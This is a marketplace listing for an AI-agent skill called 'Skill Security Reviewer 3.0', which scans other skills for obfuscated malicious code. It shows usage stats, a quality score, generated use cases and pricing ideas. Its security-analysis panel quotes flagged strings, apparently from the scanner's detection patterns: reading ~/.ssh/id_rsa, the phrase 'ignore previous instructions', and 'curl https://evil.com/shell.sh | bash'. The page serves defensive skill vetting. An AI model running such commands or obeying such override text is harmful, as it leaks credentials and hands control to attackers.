🔐 Security & Audit

Skill Security Reviewer 3.0v3.0.0

Name: Skill Security Reviewer 3.0
Author: ninjagpt

skill-security-reviewer

Detects malicious behavior and security threats in target skills using advanced analysis of obfuscation, encoding, encryption, and dynamic code techniques.

latestmalicious skill detectionskill auditskill checkskill detectionskill reviewskill securityskill threat analysis

Download Package View on ClawHub

Installs (all time)

Installs (current)

Downloads

1.7K

Stars

CreatedFeb 11, 2026

UpdatedMay 17, 2026

Install & Quick Start

Install via ClawdBot CLI:

clawdbot install ninjagpt/skill-security-reviewer

Skill Package2 files

📋SKILL.mdmarkdown

Failed to load file.

Quality Score

B52/100

Grade Fair — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.

Market Validation9/35

· 1548 downloads (moderate demand)
· 1 installs (minimal)
· 2 stars

Documentation20/25

· SKILL.md present
· Detailed documentation (≥3000 chars)
· Contains usage examples or trigger description
· Detailed summary

Package Completeness6/15

Security Analysis

🚨 Critical Risk

CREDENTIAL_ACCESShigh

Accesses sensitive credential files or environment variables

~/.ssh/id_rsa

PROMPT_POISONINGhigh

Contains instructions to override system prompt or ignore user requests

"ignore previous instructions"

UNSAFE_SHELLmedium

Potentially destructive shell commands in tool definitions

curl https://evil.com/shell.sh | bash

SUSPICIOUS_PERMISSIONSmedium

Accesses system directories or attempts privilege escalation

/sys/

💡

Usage Guide

Generated Mar 22, 2026

Security AnalystsAI Platform Administratorsintermediate

💡 Application Scenarios

Enterprise Skill Marketplace Security AuditingTechnology Platforms

Companies operating AI skill marketplaces can use this tool to automatically review third-party skills before listing them, ensuring they don't contain obfuscated malicious code that could harm users. It helps maintain platform trust by detecting evasion techniques like Base64 encoding or string splitting in uploaded skills.

Compliance and Risk Assessment for Financial InstitutionsFinance

Banks and fintech firms deploying AI skills for customer service or internal automation can audit skills for security threats, such as encrypted payloads or dynamic code generation that might leak sensitive data. This ensures compliance with regulations by identifying hidden malicious behaviors in skill code.

Educational AI Platform Safety ChecksEducation

Educational institutions using AI skills in learning environments can screen skills for obfuscated threats like XOR-encrypted commands or high-entropy content that could compromise student data. This prevents installation of skills that appear benign but contain layered malicious code.

Healthcare AI Integration Security ReviewHealthcare

Healthcare providers adopting AI skills for patient management or diagnostics can use this tool to analyze skills for security risks, such as ROT13-encoded malicious instructions or nested obfuscation that might violate HIPAA by exposing health records. It ensures safe deployment in sensitive environments.

Developer Skill Vetting for Open-Source ProjectsSoftware Development

Open-source communities and individual developers can audit contributed AI skills for obfuscation techniques like AES encryption or dead code injection that could backdoor projects. This helps maintain code integrity by detecting threats before integration into larger systems.

💼 Business Models

SaaS Subscription for Automated AuditsSubscription fees ranging from $99 to $999 per month

Offer a cloud-based service where users submit skill names for automated security reviews, with tiered pricing based on scan frequency and report depth. Revenue comes from monthly subscriptions, targeting enterprises needing continuous threat detection for their AI ecosystems.

Enterprise Licensing for On-Premise DeploymentOne-time licenses from $5,000 to $50,000 plus 20% annual support fees

Sell licenses for on-premise installation of the tool, allowing large organizations to integrate it into their internal security workflows without data leaving their networks. Revenue is generated through one-time license fees and annual support contracts.

Freemium Model with Premium Analysis FeaturesFreemium with premium features at $49-$199 per user annually

Provide a free basic version for individual users to review skills with limited detection layers, while charging for advanced features like multi-layer obfuscation analysis or custom encryption detection. Revenue streams include premium upgrades and pay-per-scan options for heavy users.

💬 Integration Tip

Integrate this tool into CI/CD pipelines to automatically scan new skills before deployment, ensuring security checks are part of the development lifecycle without manual intervention.